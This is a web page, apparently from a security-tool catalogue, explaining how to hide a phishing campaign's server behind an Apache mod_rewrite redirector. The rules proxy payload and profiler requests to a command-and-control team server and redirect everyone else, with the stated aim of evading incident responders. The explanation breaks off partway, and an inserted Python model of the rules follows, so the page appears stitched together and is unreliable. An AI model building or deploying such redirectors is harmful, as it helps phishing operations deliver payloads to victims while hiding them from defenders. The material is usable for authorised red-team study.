Invalid URI Redirection with Apache mod_rewrite

There have been times when a curious phish recipient or a zealous help desk staff member has loaded the phishing link in their browser and decided to take a peek at a higher directory or the root domain. Of course, most of the time there isn't much else on the site to see. In those cases, the chances of being reported to IR went up significantly, sometimes leading to a phishing campaign being blocked. This is where invalid URI redirection comes in handy: we can whitelist the resources the Apache server will proxy for the targets and redirect any other request to the target's real domain or another page of our choosing.

In the demo below, the user navigates to spoofdomain.com/really/long/url.html and is served a page; however, when the user navigates to spoofdomain.com/really/ the browser is redirected to google.com.

RewriteEngine On
RewriteCond %{REQUEST_URI} ^/(profiler|payload)/?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^http://SPOOFED-DOMAIN.com [NC]
RewriteRule ^.*$ http://TEAMSERVER-IP%{REQUEST_URI} [P]
RewriteRule ^.*$ http://REDIRECTION-URL.com/? [L,R=302]

Line by line explanation:
Enable the rewrite engine.
If the request's URI is either '/profiler' or '/payload' (with an optional trailing slash), ignoring case; OR
If the request's referer starts with 'http://SPOOFED-DOMAIN.com', ignoring case;
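To check how the two conditions combine before deploying a ruleset like the one above, here is an added Python model of it (example code, not from the page's author or the tool). TEAMSERVER-IP, REDIRECTION-URL.com and SPOOFED-DOMAIN.com are the page's own placeholders; the model assumes Apache's behaviour that %{REQUEST_URI} carries the path without the query string and that the [P] flag implies [L].

```python
import re
from dataclasses import dataclass

# Placeholders taken from the page's own config, not real hosts.
TEAMSERVER = "http://TEAMSERVER-IP"
REDIRECT_TARGET = "http://REDIRECTION-URL.com/"
SPOOFED_DOMAIN = "http://SPOOFED-DOMAIN.com"

# RewriteCond %{REQUEST_URI} ^/(profiler|payload)/?$ [NC,OR]
URI_ALLOWLIST = re.compile(r"^/(profiler|payload)/?$", re.IGNORECASE)
# RewriteCond %{HTTP_REFERER} ^http://SPOOFED-DOMAIN.com [NC]
REFERER_RULE = re.compile(r"^" + re.escape(SPOOFED_DOMAIN), re.IGNORECASE)


@dataclass
class Decision:
    action: str   # "proxy" or "redirect"
    target: str   # where the request is proxied or redirected to
    status: int   # 200 for a proxied hit, 302 for the redirect rule


def route(request_uri: str, referer: str = "") -> Decision:
    """Apply the two RewriteRules in order, mirroring Apache's semantics.

    The two RewriteConds are joined by [OR], so the first RewriteRule ([P],
    which implies [L]) fires when EITHER the URI is on the allowlist OR the
    Referer starts with the spoofed domain. Any other request falls through
    to the second rule, a 302 to REDIRECT_TARGET; the trailing '?' in that
    rule drops any query string from the redirect location.
    request_uri is the path only (no query string), as %{REQUEST_URI} is.
    """
    if URI_ALLOWLIST.search(request_uri) or REFERER_RULE.search(referer):
        return Decision("proxy", TEAMSERVER + request_uri, 200)
    return Decision("redirect", REDIRECT_TARGET, 302)


if __name__ == "__main__":
    # Constructed sample requests: the page's demo plus a few edge cases.
    for uri, ref in [("/really/long/url.html", ""), ("/really/", ""),
                     ("/Payload/", ""), ("/profiler/extra", ""),
                     ("/really/", "http://SPOOFED-DOMAIN.com/really/long/url.html")]:
        print(uri, repr(ref), "->", route(uri, ref))
```

Note that /really/long/url.html itself only reaches the team server when the Referer condition holds; with an empty Referer it is redirected like any other unlisted path.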

ALTERNATIVES

InQL is a Burp Suite extension for advanced GraphQL testing and vulnerability detection

A Rust-based command-line tool for analyzing .apk files to detect vulnerabilities.

A software supply chain security platform that analyzes binaries and software components to detect malware, vulnerabilities, exposed secrets, and tampering throughout the development lifecycle.

An automated API security testing platform that provides continuous vulnerability assessment, validation, and educational resources for API endpoint security.

A script that implements Cognito attacks such as Account Oracle or Privilege Escalation

Cutting-edge technology for developing security applications within the Linux kernel.

Static application security testing (SAST) tool for scanning source code against security and privacy risks.

A static code analysis tool for parsing common data formats to detect hardcoded credentials and dangerous functions.
